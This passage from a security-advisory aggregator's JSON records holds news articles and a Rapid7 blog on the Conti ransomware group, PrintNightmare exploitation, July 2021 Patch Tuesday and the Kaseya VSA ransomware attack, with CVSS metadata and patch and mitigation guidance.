Group](https://thehackernews.com/new-images/img/a/AVvXsEgOlxdMar0Fk9C_1oq4rsZqCsRuaWDFa_UwPznj1p4XnxV22g7c-3gidrF7ZVnxd0TVDTn8qhzr16V265fVSa3d-p7SOODkUMikIREYKzV6MyCaPI1KWzNgYj3TduhqzgszRUX6zZkCytED5c4K-icaEZjwN4cvwnz1D0zehnwVGdYAwJXLo8uaJijX=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgOlxdMar0Fk9C_1oq4rsZqCsRuaWDFa_UwPznj1p4XnxV22g7c-3gidrF7ZVnxd0TVDTn8qhzr16V265fVSa3d-p7SOODkUMikIREYKzV6MyCaPI1KWzNgYj3TduhqzgszRUX6zZkCytED5c4K-icaEZjwN4cvwnz1D0zehnwVGdYAwJXLo8uaJijX>)\n\n\"Conti customers \u2013 affiliate threat actors \u2013 use [a digital] management panel to create new ransomware samples, manage their victims, and collect data on their attacks,\" noted the researchers, detailing the syndicate's attack kill chain leveraging PrintNightmare ([CVE-2021-1675](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>), [CVE-2021-34527](<https://thehackernews.com/2021/07/microsoft-warns-of-critical.html>), and [CVE-2021-36958](<https://thehackernews.com/2021/08/microsoft-security-bulletin-warns-of.html>)) and FortiGate ([CVE-2018-13374](<https://nvd.nist.gov/vuln/detail/CVE-2018-13374>) and [CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)) vulnerabilities to compromise unpatched systems.\n\n[![Conti Ransomware Group](https://thehackernews.com/new-images/img/a/AVvXsEh5pQ7nISIe-f2lC7T7iJVkfmQ4L9uCXsO1rxdPo0YzkwJ4-Q15UkgDuRGhckTpdbAYrR1h3kYePBPrRNFWefg6MtaX_jlMsgcojwvu-zrrtvaw0hKxGJkD-dTl06UiZOX1R5kuboLkxyuot8hDBrgxX1fH8yoVdsv0e1f0rvziG6_Mw-IWMJUBBgQg=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEh5pQ7nISIe-f2lC7T7iJVkfmQ4L9uCXsO1rxdPo0YzkwJ4-Q15UkgDuRGhckTpdbAYrR1h3kYePBPrRNFWefg6MtaX_jlMsgcojwvu-zrrtvaw0hKxGJkD-dTl06UiZOX1R5kuboLkxyuot8hDBrgxX1fH8yoVdsv0e1f0rvziG6_Mw-IWMJUBBgQg>)\n\nEmerging on the cybercrime landscape in October 2019, Conti is believed to be the work of a Russia-based threat group called [Wizard Spider](<https://malpedia.caad.fkie.fraunhofer.de/actor/wizard_spider>), which is also the operator of the infamous [TrickBot](<https://thehackernews.com/2021/11/trickbot-operators-partner-with-shatak.html>) banking malware. Since then, at least 567 different companies have had their business-critical data exposed on the victim shaming site, with the ransomware cartel receiving over 500 bitcoin ($25.5 million) in payments since July 2021.\n\nWhat's more, an analysis of ransomware samples and the bitcoin wallet addresses utilized for receiving the payments has revealed a connection between Conti and Ryuk, with both families heavily banking on TrickBot, Emotet, and BazarLoader for actually [delivering the file-encrypting payloads](<https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html>) onto victim's networks via email phishing and other social engineering schemes.\n\n[![Conti Ransomware Group](https://thehackernews.com/new-images/img/a/AVvXsEgySne4_su9eRCap6MABBaa8kbBo2rWbr8gzBUOmkmLhbonXU-etPl5K4VuXHkduN2lH7fMHbQ7q8Wq0HsqBnUz9P3JWJBqtztJQAEPOJWnoAVuecd8Zyblq-TOPPfmILc40tmzfs9VX0h_utrR3fydA8JQm8EO0PO7BIKlRaSIBA8_I717s_bvckQ5=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgySne4_su9eRCap6MABBaa8kbBo2rWbr8gzBUOmkmLhbonXU-etPl5K4VuXHkduN2lH7fMHbQ7q8Wq0HsqBnUz9P3JWJBqtztJQAEPOJWnoAVuecd8Zyblq-TOPPfmILc40tmzfs9VX0h_utrR3fydA8JQm8EO0PO7BIKlRaSIBA8_I717s_bvckQ5>)\n\nPRODAFT said it was also able to gain access to the group's recovery service and an admin management panel hosted as a Tor hidden service on an Onion domain, revealing extensive details of a clearnet website called \"contirecovery[.]ws\" that contains instructions for purchasing decryption keys from the affiliates. Interestingly, an investigation into Conti's ransomware negotiation process [published](<https://team-cymru.com/blog/2021/10/05/collaborative-research-on-the-conti-ransomware-group/>) by Team Cymru last month highlighted a similar open web URL named \"contirecovery[.]info.\"\n\n\"In order to tackle the complex challenge of disrupting cybercriminal organizations, public and private forces need to work collaboratively with one another to better understand and mitigate the wider legal and commercial impact of the threat,\" the researchers said.\n\n**_Update:_** The Conti ransomware's payment [portals](<https://twitter.com/VK_Intel/status/1461810216241086467>) are back up and running, more than 24 hours after they were first taken down in response to a report that identified the real IP address of one of its recovery (aka payment) servers \u2014 217.12.204[.]135 \u2014 thereby effectively bolstering its security measures.\n\n\"Looks like Europeans have also decided to abandon their manners and go full-gansta simply trying to break our systems,\"the gang said in a statement posted on their blog, effectively confirming PRODAFT's findings, but characterizing the details as \"simply disinformation,\" and that \"the reported 25kk which we 'made since July' is straight-up BS - we've made around 300kk at least.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-19T06:50:00", "type": "thn", "title": "Experts Expose Secrets of Conti Ransomware Group That Made 25 Million from Victims", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13374", "CVE-2018-13379", "CVE-2021-1675", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-11-20T15:13:21", "id": "THN:F35E41E26872B23A7F620C6D8F7E2334", "href": "https://thehackernews.com/2021/11/experts-expose-secrets-of-conti.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:14", "description": "[![](https://thehackernews.com/images/-YB6xMmNkBp0/YRYuIvxMidI/AAAAAAAADhg/a2Ee5QkoQZw6JlnYhCIdg3Nk-HM2yu2wwCLcBGAsYHQ/s0/ransomware.jpg)](<https://thehackernews.com/images/-YB6xMmNkBp0/YRYuIvxMidI/AAAAAAAADhg/a2Ee5QkoQZw6JlnYhCIdg3Nk-HM2yu2wwCLcBGAsYHQ/s0/ransomware.jpg>)\n\nRansomware operators such as Magniber and Vice Society are actively exploiting vulnerabilities in Windows Print Spooler to compromise victims and spread laterally across a victim's network to deploy file-encrypting payloads on targeted systems.\n\n\"Multiple, distinct threat actors view this vulnerability as attractive to use during their attacks and may indicate that this vulnerability will continue to see more widespread adoption and incorporation by various adversaries moving forward,\" Cisco Talos [said](<https://blog.talosintelligence.com/2021/08/vice-society-ransomware-printnightmare.html>) in a report published Thursday, corroborating an [independent analysis](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) from CrowdStrike, which observed instances of Magniber ransomware infections targeting entities in South Korea.\n\nWhile Magniber ransomware was first spotted in late 2017 singling out victims in South Korea through malvertising campaigns, Vice Society is a new entrant that emerged on the ransomware landscape in mid-2021, primarily targeting public school districts and other educational institutions. The attacks are said to have taken place since at least July 13.\n\nSince June, a series of \"PrintNightmare\" issues affecting the Windows print spooler service has come to light that could enable remote code execution when the component performs privileged file operations -\n\n * [**CVE-2021-1675**](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on June 8)\n * [**CVE-2021-34527**](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on July 6-7)\n * [**CVE-2021-34481**](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)\n * [**CVE-2021-36936**](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10) \n * [**CVE-2021-36947**](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)\n * [**CVE-2021-34483**](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>) \\- Windows Print Spooler Elevation of Privilege Vulnerability (Patched on August 10)\n * [**CVE-2021-36958**](<https://thehackernews.com/2021/08/microsoft-security-bulletin-warns-of.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Unpatched)\n\nCrowdStrike noted it was able to successfully prevent attempts made by the Magniber ransomware gang at exploiting the PrintNightmare vulnerability.\n\nVice Society, on the other hand, leveraged a variety of techniques to conduct post-compromise discovery and reconnaissance prior to bypassing native Windows protections for credential theft and privilege escalation.\n\n[![Ransomware](https://thehackernews.com/images/-JlsTWIHVgX4/YRYltMOGBKI/AAAAAAAADhQ/pzUFIcW6y0ABjOe3PuUQE5cPSnEOvGP9ACLcBGAsYHQ/s728-e1000/ransomware.jpg)](<https://thehackernews.com/images/-JlsTWIHVgX4/YRYltMOGBKI/AAAAAAAADhQ/pzUFIcW6y0ABjOe3PuUQE5cPSnEOvGP9ACLcBGAsYHQ/s0/ransomware.jpg>)\n\nSpecifically, the attacker is believed to have used a malicious library associated with the PrintNightmare flaw (CVE-2021-34527) to pivot to multiple systems across the environment and extract credentials from the victim.\n\n\"Adversaries are constantly refining their approach to the ransomware attack lifecycle as they strive to operate more effectively, efficiently, and evasively,\" the researchers said. \"The use of the vulnerability known as PrintNightmare shows that adversaries are paying close attention and will quickly incorporate new tools that they find useful for various purposes during their attacks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-13T08:29:00", "type": "thn", "title": "Ransomware Gangs Exploiting Windows Print Spooler Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34527", "CVE-2021-36936", "CVE-2021-36947", "CVE-2021-36958"], "modified": "2021-08-13T08:32:51", "id": "THN:6428957E9DED493169A2E63839F98667", "href": "https://thehackernews.com/2021/08/ransomware-gangs-exploiting-windows.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:21", "description": "[![](https://thehackernews.com/images/-aVEUxlp9r9o/YO5q47NA_bI/AAAAAAAADL4/tkntZNY2smU5FPaAkTU1qBYUg8VPhp8NACLcBGAsYHQ/s0/windows-update-download.jpg)](<https://thehackernews.com/images/-aVEUxlp9r9o/YO5q47NA_bI/AAAAAAAADL4/tkntZNY2smU5FPaAkTU1qBYUg8VPhp8NACLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nMicrosoft rolled out [Patch Tuesday updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jul>) for the month of July with fixes for a total of 117 security vulnerabilities, including nine zero-day flaws, of which four are said to be under active attacks in the wild, potentially enabling an adversary to take control of affected systems. \n\nOf the 117 issues, 13 are rated Critical, 103 are rated Important, and one is rated as Moderate in severity, with six of these bugs publicly known at the time of release. \n\nThe updates span across several of Microsoft's products, including Windows, Bing, Dynamics, Exchange Server, Office, Scripting Engine, Windows DNS, and Visual Studio Code. July also marks a dramatic jump in the volume of vulnerabilities, surpassing the number Microsoft collectively addressed as part of its updates in [May](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) (55) and [June](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>) (50).\n\nChief among the security flaws actively exploited are as follows \u2014\n\n * **CVE-2021-34527** (CVSS score: 8.8) - Windows Print Spooler Remote Code Execution Vulnerability (publicly disclosed as \"[PrintNightmare](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>)\")\n * **CVE-2021-31979** (CVSS score: 7.8) - Windows Kernel Elevation of Privilege Vulnerability\n * **CVE-2021-33771** (CVSS score: 7.8) - Windows Kernel Elevation of Privilege Vulnerability\n * **CVE-2021-34448** (CVSS score: 6.8) - Scripting Engine Memory Corruption Vulnerability\n\nMicrosoft also stressed the high attack complexity of CVE-2021-34448, specifically stating that the attacks hinge on the possibility of luring an unsuspecting user into clicking on a link that leads to a malicious website hosted by the adversary and contains a specially-crafted file that's engineered to trigger the vulnerability.\n\nThe other five publicly disclosed, but not exploited, zero-day vulnerabilities are listed below \u2014\n\n * **CVE-2021-34473** (CVSS score: 9.1) - Microsoft Exchange Server Remote Code Execution Vulnerability\n * **CVE-2021-34523** (CVSS score: 9.0) - Microsoft Exchange Server Elevation of Privilege Vulnerability\n * **CVE-2021-33781** (CVSS score: 8.1) - Active Directory Security Feature Bypass Vulnerability\n * **CVE-2021-33779** (CVSS score: 8.1) - Windows ADFS Security Feature Bypass Vulnerability\n * **CVE-2021-34492** (CVSS score: 8.1) - Windows Certificate Spoofing Vulnerability\n\n\"This Patch Tuesday comes just days after out-of-band updates were released to address PrintNightmare \u2014 the critical flaw in the Windows Print Spooler service that was found in all versions of Windows,\" Bharat Jogi, senior manager of vulnerability and threat research at Qualys, told The Hacker News.\n\n\"While MSFT has released updates to fix the vulnerability, users must still ensure that necessary configurations are set up correctly. Systems with misconfigurations will continue to be at risk of exploitation, even after the latest patch has been applied. PrintNightmare was a highly serious issue that further underscores the importance of marrying detection and remediation,\" Jogi added.\n\nThe PrintNightmare vulnerability has also prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to [release an emergency directive](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/cisa-issues-emergency-directive-microsoft-windows-print-spooler>), urging federal departments and agencies to apply the latest security updates immediately and disable the print spooler service on servers on Microsoft Active Directory Domain Controllers.\n\nAdditionally, Microsoft also rectified a security bypass vulnerability in Windows Hello biometrics-based authentication solution ([CVE-2021-34466](<https://www.cyberark.com/resources/threat-research-blog/bypassing-windows-hello-without-masks-or-plastic-surgery>), CVSS score: 5.7) that could permit an adversary to spoof a target's face and get around the login screen.\n\nOther critical flaws remediated by Microsoft include remote code execution vulnerabilities affecting Windows DNS Server (CVE-2021-34494, CVSS score 8.8) and Windows Kernel (CVE-2021-34458), the latter of which is rated 9.9 on the CVSS severity scale.\n\n\"This issue allows a single root input/output virtualization (SR-IOV) device which is assigned to a guest to potentially interfere with its Peripheral Component Interface Express (PCIe) siblings which are attached to other guests or to the root,\" Microsoft noted in its advisory for CVE-2021-34458, adding Windows instances hosting virtual machines are vulnerable to this flaw.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update or by selecting Check for Windows updates.\n\n### Software Patches From Other Vendors\n\nAlongside Microsoft, patches have also been released by a number of other vendors to address several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html/security/security-bulletin.ug.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-07-01>)\n * [Apache Tomcat](<https://mail-archives.us.apache.org/mod_mbox/www-announce/202107.mbox/%3Cd050b202-b64e-bc6f-a630-2dd83202f23a%40apache.org%3E>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/article/CTX319750>)\n * [Juniper Networks](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11180&cat=SIRT_1&actp=LIST>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-July/thread.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=580617506>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-14T05:03:00", "type": "thn", "title": "Update Your Windows PCs to Patch 117 New Flaws, Including 9 Zero-Days", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31979", "CVE-2021-33771", "CVE-2021-33779", "CVE-2021-33781", "CVE-2021-34448", "CVE-2021-34458", "CVE-2021-34466", "CVE-2021-34473", "CVE-2021-34492", "CVE-2021-34494", "CVE-2021-34523", "CVE-2021-34527"], "modified": "2021-07-17T11:52:45", "id": "THN:9FD8A70F9C17C3AF089A104965E48C95", "href": "https://thehackernews.com/2021/07/update-your-windows-pcs-to-patch-117.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-07-13T17:08:07", "description": "![Managed Service Providers Used in Coordinated, Mass Ransomware Attack Impacting Hundreds of Companies](https://blog.rapid7.com/content/images/2021/07/rapid7-og--1-.jpg)\n\nRapid7 is aware of and tracking all information surrounding a coordinated, mass ransomware attack reported to be affecting hundreds of organizations. Huntress Labs is maintaining a public [Reddit thread](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>) documenting the scope and triage of an event that has, as of the original post date (see updates below), stemmed from 8 managed service providers. Rapid7 does not use Kaseya or a Kaseya MSP and we are not affected by this mass ransomware attack.\n\nRapid7 is updating this post as more information becomes available. Core information is below the most recent updates.\n\n### 2021-07-13\n\n * CISA has [updated their Kaseya ransomware event guidance](<https://us-cert.cisa.gov/kaseya-ransomware-attack>) for affected managed service providers and their customers.\n\n### 2021-07-11\n\n * In a video post today, Kaseya [has indicated](<https://videos.sproutvideo.com/embed/d39ddab51e14efc25a/50fb34477e68d73c?type=hd>) that they are still planning to go ahead with re-enabling an updated VSA SaaS and rollout of the on-prem VSA server update. Some runbook instructions have changed, so any organization planning on going live today should [review those changes](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) to see if they impact your environment.\n\n### 2021-07-09\n\n * The Dutch Institue for Vulnerability Disclosure (DIVD) [published](<https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/>) more information on the specific vulnerabilities they shared with Kaseya: \n * [CVE-2021-30116](<https://attackerkb.com/search?q=CVE-2021-30116>) \\- A credentials leak and business logic flaw, resolution in progress. [CVSS 10]\n * [CVE-2021-30117](<https://attackerkb.com/search?q=CVE-2021-30117>) \\- An SQL injection vulnerability, resolved in May 8th patch. [CVSS 9.8]\n * [CVE-2021-30118](<https://attackerkb.com/search?q=CVE-2021-30118>) \\- A Remote Code Execution vulnerability, resolved in April 10th patch. (v9.5.6) [CVSS 9.8]\n * [CVE-2021-30119](<https://attackerkb.com/search?q=CVE-2021-30119>) \\- A Cross Site Scripting vulnerability, resolution in progress. [CVSS 5.4]\n * [CVE-2021-30120](<https://attackerkb.com/search?q=CVE-2021-30120>) \\- 2FA bypass, resolution in progress. [CVSS 9.9]\n * [CVE-2021-30121](<https://attackerkb.com/search?q=CVE-2021-30121>) \\- A Local File Inclusion vulnerability, resolved in May 8th patch. [CVSS 6.5]\n * [CVE-2021-30201](<https://attackerkb.com/search?q=CVE-2021-30201>) \\- A XML External Entity vulnerability, resolved in May 8th patch. [CVSS 7.5]\n * President Biden [urged Vladimir Putin](<https://www.nytimes.com/2021/07/09/us/politics/putin-biden-ransomware-hackers.html?referringSource=articleShare>) to \u2018take action to disrupt\u2019 Russia-based hackers behind ransomware attacks.\n\n### 2021-07-08\n\n * Kaseya has [posted a video from their CEO](<https://videos.sproutvideo.com/embed/119ddab21e19e0cd98/19739709ce717d3b?type=hd>) notifying customers that patches and VSA SaaS will likely be available this coming Sunday afternoon (July 11, 2021).\n * According to Malwarebytes, some threat actors [are capitalizing on the extended response to the Kaseya mass ransomware attack](<https://twitter.com/MBThreatIntel/status/1412518446013812737?s=20>) and are targeting victims via email with fake patches that push Cobalt Strike payloads.\n\n### 2021-07-07\n\n * Kaseya has posted runbooks for [on premesis VSAs](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403709150993>) with steps on how to prepare VSA servers for the forthcoming patch. These details include the installation of FireEye's agent software along with details on how to isolate the server from production networks, and [SaaS customers](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403709150993>) for how to prepare for the SaaS VSAs coming back online.\n\n### 2021-07-06\n\n * In a [statement posted late Monday night](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>), Kaseya provided an update on their assessment of the impact of the attack: _"we are aware of fewer than 60 Kaseya customers, all of whom were using the VSA on-premises product, who were directly compromised by this attack. While many of these customers provide IT services to multiple other companies, we understand the total impact thus far has been to fewer than 1,500 downstream businesses. We have not found evidence that any of our SaaS customers were compromised._\n * The Compromise Detection Tool, which was originally only provided directly to customers, [has been made public](<https://kaseya.box.com/s/p9b712dcwfsnhuq2jmx31ibsuef6xict>). The tool searches for indicators of compromise, evidence of data encryption, and the REvil ransom note.\n * Kaseya also stated that \u2014 based on advice by outside experts \u2014 customers who experienced ransomware and receive communication from the attackers _should not click on any links as they may be weaponized_.\n\n### 2021-07-05\n\n * Deputy National Security Advisor for Cyber and Emerging Technology Anne Neuberger [issued a statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/07/04/statement-by-deputy-national-security-advisor-for-cyber-and-emerging-technology-anne-neuberger-on-reporting-kaseya-compromises/>) noting that the President has directed the full resources of the government to investigate this incident and urged anyone who believes their systems have been compromised in the Kaseya ransomware incident to immediately report to the Internet Crime Complaint Center at <https://www.IC3.gov>.\n * The Associated Press [is reporting](<https://apnews.com/article/joe-biden-europe-government-and-politics-technology-business-fc0df4c42f8cd6148bf936ca24bb5cbe>) that REvil has offered a blanket decryption for all victims of the Kaseya attack in exchange for $70 million.\n * Incident responders across multiple firms are indicating the number of victim organizations is in the thousands, spanning over 18 countries.\n\n### 2021-07-04\n\n * Cado Security published [resources](<https://www.cadosecurity.com/post/resources-for-dfir-professionals-responding-to-the-revil-ransomware-kaseya-supply-chain-attack>) which can aid responders as they triage theie exposure to the mass ransomware incident.\n * CISA and the FBI have issued [guidance for MSPs and their customers](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>) who have been affected by the Kaseya VSA supply-chain ransomware attack.\n\n### 2021-07-03 Update\n\n * The Washington Post has [a story with information on the ransom demands being made](<https://www.washingtonpost.com/technology/2021/07/02/kaseya-ransomware-attack/>)\n * The Dutch Institue for Vulnerability Disclosure (DIVD) [posted information](<https://csirt.divd.nl/2021/07/03/Kaseya-Case-Update/>) into their ongoing investigation and response into the Kaseya incident, which includes details on their efforts to identify and secure internet-facing VSA servers.\n * CISA posted an [initial advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack>) and is taking action to understand and address the recent supply-chain ransomware attack.\n * Bloomberg [is reporting](<https://www.bloomberg.com/news/articles/2021-07-03/number-of-victims-continues-to-grow-in-massive-ransomware-attack>) that the attack (so far) spans over 1,000 organizations across 11 countries with numerous downstream impacts.\n\n### Original/Main Content\n\nEvidence points to a supply chain attack targeting Kaseya VSA patch management and monitoring software. Ransom notes suggest REvil is behind the coordinated attack.\n\nRapid7 Managed Detection and Response teams suggest that, out of an abundance of caution, organizations that use either an on-premise Kaseya VSA solution or the Kaseya cloud-based VSA solution perform the following steps immediately:\n\n * Disabling or uninstalling the Kaseya agent\n * If you host the Kaseya management server, shut down this system (Kaseya also strongly suggests this course of action)\n\nKaysea appears to be providing updates via their [public helpdesk page](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>) and their [status page](<https://status.kaseya.net/>) provides visibility into the status of their hosted infrastructure.\n\nResearcher [@BushidoToken](<https://twitter.com/BushidoToken>) has provided a [link to a GitHub gist containing the REvil configuration dump](<https://twitter.com/BushidoToken/status/1411054457450811397>), which includes indicators of compromise organizations may be able to use to detect evidence of these actors operating in your infrastructure.\n\n## Rapid7 Customers\n\n### Managed Detection and Response\n\nRapid7's Managed Detection and Response (MDR) team had existing attacker behavior detections that identified Kaseya-related ransomware activity beginning on Friday, July 2, 2021. Following the initial wave of alerts on Friday, July 2, MDR sent an email communication with a `Critical Advisory` to all MDR customers with guidance on disabling Kaseya and mitigating risk. We have conducted hunts across customer environments and deployed additional detections to accelerate identification of the threat. Affected customers have been notified.\n\n### InsightIDR\n\nRapid7 has deployed the following detections in InsightIDR for attacker behavior related to the Kaseya ransomware attack:\n\n * Attacker Technique - CertUtil With Decode Flag\n * Suspicious Process - Renamed CertUtil\n * Suspicious Process - Certutil Decodes Executable File\n * Attacker Tool - KWorking\\agent.exe", "cvss3": {}, "published": "2021-07-13T16:00:00", "type": "rapid7blog", "title": "Managed Service Providers Used in Coordinated, Mass Ransomware Attack Impacting Hundreds of Companies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30119", "CVE-2021-30120", "CVE-2021-30121", "CVE-2021-30201"], "modified": "2021-07-13T16:00:00", "id": "RAPID7BLOG:2CAE6785586002C85C620CF61D6C68C2", "href": "https://blog.rapid7.com/2021/07/13/managed-service-providers-used-in-coordinated-mass-ransomware-attack-impacting-hundreds-of-companies/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-07T14:55:28", "description": "![CVE-2020-7387..7390: Multiple Sage X3 Vulnerabilities](https://blog.rapid7.com/content/images/2021/07/erp.jpg)\n\nFour vulnerabilities involving Sage X3 were identified by Rapid7 researchers Jonathan Peterson, Aaron Herndon, Cale Black, Ryan Villarreal, and William Vu. These vulnerabilities were reported to Sage according to Rapid7's usual [vulnerability disclosure process](<https://www.rapid7.com/security/disclosure/#zeroday>) and were fixed in recent releases for Sage X3 Version 9 (those components that ship with Syracuse 9.22.7.2), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Sage X3 Version 11 (Syracuse v11.25.2.6), and Sage X3 Version 12 (Syracuse v12.10.2.8). Note, there was no commercially available Version 10 of Sage X3.\n\nThese vulnerabilities are summarized in the table below: The first two are protocol-related issues involving remote administration of Sage X3, and the latter two are web application vulnerabilities. Generally speaking, Sage X3 installations should not be exposed directly to the internet, and should instead be made available via a secure VPN connection where required. Following this operational advice effectively mitigates all four vulnerabilities, though customers are still urged to update according to their usual patch cycle schedules. \n\nCVE Identifier | CWE Identifier | CVSS score 